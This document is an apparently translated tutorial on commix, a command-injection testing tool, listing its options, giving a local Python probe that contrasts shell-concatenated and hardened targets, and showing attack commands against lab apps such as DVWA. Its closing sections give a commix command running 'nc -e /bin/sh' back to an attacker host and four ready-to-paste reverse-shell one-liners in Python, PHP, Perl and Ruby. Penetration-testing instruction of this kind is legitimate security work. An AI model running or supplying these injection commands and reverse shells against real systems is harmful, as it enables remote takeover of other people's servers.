Introduction
Project address: https://github.com/stasinopoulos/commix
Commix is a command injection testing tool written in Python. It automates finding a request parameter that is vulnerable to command injection, confirming the vulnerability and exploiting it; the latest version published by its authors can also import a Burp Suite history file directly as the target list for detection, which greatly improves ease of use.
Usage

General options:
  -v VERBOSE            Verbosity level (0-1, default: 0).
  --version             Show the version number and exit.
  --output-dir=..       Set a custom output directory path.
  -s SESSION_FILE       Load a session from a stored (.sqlite) file.
  --flush-session       Flush the session file for the current target.
  --ignore-session      Ignore the results stored in the session file.

Target:
  -u URL, --url=URL     Target URL.
  --url-reload          Reload the target URL after command execution.
  -l LOGFILE            Parse the target and data from an HTTP proxy log file.
  --crawl=CRAWLDEPTH    Crawl the website starting from the target URL (1-2, default: 0).

Request:
  --data=DATA           Data string to be sent through POST.
  --host=HOST           HTTP Host header.
  --referer=REFERER     HTTP Referer header.
  --user-agent=AGENT    HTTP User-Agent header.
  --random-agent        Use a randomly selected HTTP User-Agent header.
  --param-del=PDEL      Set the character used to split parameter values.
  --cookie=COOKIE       HTTP Cookie header.
  --cookie-del=CDEL     Set the character used to split cookie values.
  --headers=HEADERS     Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
  --proxy=PROXY         Use an HTTP proxy (e.g. '127.0.0.1:8080').
  --tor                 Use the Tor network.
  --tor-port=..         Set the Tor proxy port (default: 8118).
  --auth-url=..         Login panel URL.
  --auth-data=AUTH..    Login parameters and data.
  --auth-type=AUTH..    HTTP authentication type (e.g. 'Basic' or 'Digest').
  --auth-cred=AUTH..    HTTP authentication credentials (e.g. 'admin:admin').
  --ignore-401          Ignore HTTP error 401 (Unauthorized).
  --force-ssl           Force the use of SSL/HTTPS.

Enumeration (these options can be used to enumerate the target host):
  --all                 Retrieve everything.
  --current-user        Retrieve the current user name.
  --hostname            Retrieve the current hostname.
  --is-root             Check whether the current user has root privileges.
  --is-admin            Check whether the current user has administrator privileges.
  --sys-info            Retrieve system information.
  --users               Retrieve the system users.
  --passwords           Retrieve the system users' password hashes.
  --privileges          Retrieve the system users' privileges.
  --ps-version          Retrieve the PowerShell version number.

File access (these options can be used to access files on the target host):
  --file-read=FILE..    Read a file from the target host.
  --file-write=FIL..    Write to a file on the target host.
  --file-upload=FI..    Upload a file to the target host.
  --file-dest=FILE..    Absolute path on the target host to write and/or upload to.

Modules (these options can be used to increase detection and/or injection capability):
  --icmp-exfil=IP_..    The 'ICMP exfiltration' injection module (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3').
  --dns-server=DNS..    The 'DNS exfiltration' injection module (domain name used for the DNS exfiltration attack).
  --shellshock          The 'shellshock' injection module.

Injection (these options can be used to specify which parameters to inject and to provide custom injection payloads):
  -p TEST_PARAMETER     Testable parameter(s).
  --suffix=SUFFIX       Injection payload suffix string.
  --prefix=PREFIX       Injection payload prefix string.
  --technique=TECH      Specify the injection technique(s) to use.
  --maxlen=MAXLEN       Set the maximum output length for time-related injection techniques (default: 10000 characters).
  --delay=DELAY         Set a custom time delay for time-related injection techniques (default: 1 second).
  --tmp-path=TMP_P..    Set the absolute path of the web server's temp directory.
  --root-dir=SRV_R..    Set the absolute path of the web server's root directory.
  --alter-shell=AL..    Use an alternative os-shell (e.g. 'Python').
  --os-cmd=OS_CMD       Execute a single operating system command.
  --os=OS               Force the back-end operating system to this value.
  --tamper=TAMPER       Use the given script(s) to tamper with the injection data.

Detection (these options can be used to customize the detection phase):
  --level=LEVEL         Level of tests to perform (1-3, default: 1).
  --skip-calc           Skip the mathematical calculation during the detection phase.
  --dependencies        Check for third-party (non-core) dependencies.
  --skip-waf            Skip heuristic detection of WAF/IPS/IDS protection.
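To make concrete what the Injection and Detection options above refer to (the separators a results-based probe tries, the prefix and suffix that close a quoted context, and the arithmetic check that --skip-calc turns off), here is an added Python example. It is not commix's own code: it is a miniature probe run against two constructed local targets, one that concatenates the user value into a /bin/sh command string and one that passes the value as a single argv element. The target functions, the separator list, the token format and the base value 127.0.0.1 are all assumptions made for the example, not commix internals.

```python
"""Miniature results-based command injection probe (added example, not
commix code). It shows what the Injection/Detection options refer to:
trying several command separators, wrapping the payload in a prefix and
suffix, and confirming execution with an arithmetic expression.
"""
import random
import subprocess

# Separators tried between the legitimate value and the injected command.
# The list is an assumption for this example; a bare newline works where
# ';' is filtered (it is sent as %0a on the wire).
SEPARATORS = [";", "|", "&&", "||", "\n"]


def vulnerable_lookup(host: str) -> str:
    """Constructed target: the user value is concatenated into a command
    string and run through /bin/sh, the bug class commix looks for."""
    proc = subprocess.run("echo Resolving " + host, shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def quoted_vulnerable_lookup(host: str) -> str:
    """Constructed target that single-quotes the value. Still injectable,
    but only once the payload closes the quote (prefix) and comments out
    the rest of the line (suffix), as --prefix/--suffix do in commix."""
    proc = subprocess.run("echo 'Resolving " + host + "'", shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def hardened_lookup(host: str) -> str:
    """Same feature with no shell: the value is one argv element, so shell
    metacharacters are data rather than syntax."""
    proc = subprocess.run(["echo", "Resolving", host],
                          capture_output=True, text=True)
    return proc.stdout


def probe(send, prefix="", suffix="", calc=True):
    """Return the list of separators for which the injected command ran.

    `send(value)` submits one parameter value and returns the response body.
    With calc=True the marker is `echo <token>$((a+b))`, so a hit requires
    the shell to have evaluated the sum, not merely reflected our input.
    calc=False mirrors what --skip-calc disables: faster, but a target that
    echoes the raw value back then looks injected for every separator.
    """
    a, b = random.randint(10, 99), random.randint(10, 99)
    token = "cmx%d" % random.randint(10000, 99999)
    if calc:
        marker = "echo %s$((%d+%d))" % (token, a, b)
        expect = "%s%d" % (token, a + b)
    else:
        marker, expect = "echo " + token, token
    hits = []
    for sep in SEPARATORS:
        body = send(prefix + "127.0.0.1" + sep + marker + suffix)
        if expect in body:
            hits.append(sep)
    return hits


if __name__ == "__main__":
    print("concatenated target            :", probe(vulnerable_lookup))
    print("quoted target, no prefix/suffix:", probe(quoted_vulnerable_lookup))
    print("quoted target, prefix ' suffix #:",
          probe(quoted_vulnerable_lookup, prefix="'", suffix=" #"))
    print("quoted target, skip-calc style :",
          probe(quoted_vulnerable_lookup, calc=False))
    print("argv target (hardened)         :", probe(hardened_lookup))
```

The `||` separator never registers against these targets because the legitimate echo succeeds, so the right-hand side is never run; the quoted target registers nothing until the payload supplies a closing quote and a trailing comment, and the calc=False run against it reports every separator, which is exactly the false positive the arithmetic check exists to rule out.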
Examples of Use
python commix.py --url="http://192.168.1.4/test/test.php?addr=INJECT_HERE" --os-cmd="nc -e /bin/sh 192.168.1.3 1234"

INJECT_HERE marks the parameter value that commix replaces with its payloads; here the command executed on the target is a netcat reverse shell back to 192.168.1.3:1234.

Some further usage examples, taken from Freebuf (http://www.freebuf.com/sectool/64030.html):

Testing Damn Vulnerable Web App (DVWA)
python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

Testing php-Charts 1.0 with a custom injection payload prefix and suffix
python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="'" --suffix="//"

Testing OWASP Mutillidae with extra headers and an HTTP proxy
python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

Testing Persistence with the ICMP exfiltration technique
su -c 'python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"'

This one is run as root (su -c) because the ICMP exfiltration module needs a raw socket on the attacking machine to receive the exfiltrated data.
Reverse shells

The following one-liners, in the form commix's documentation gives them, can be passed to --os-cmd or typed at the os-shell prompt to get a reverse shell back to a listener on 192.168.1.3:1234 (e.g. nc -lvnp 1234). Double quotes are backslash-escaped and & is written as %26 so the payload survives being embedded in an HTTP parameter value.

1. Python reverse shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.3\",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'

2. PHP reverse shell:
php -r '\$sock=fsockopen(\"192.168.1.3\",1234);exec(\"/bin/sh -i <%263 >%263 2>%263\");'

3. Perl reverse shell:
perl -e 'use Socket;\$i=\"192.168.1.3\";\$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec(\"/bin/sh -i\");};'

4. Ruby reverse shell:
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"192.168.1.3\",1234);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'
Commix Command Injection exploit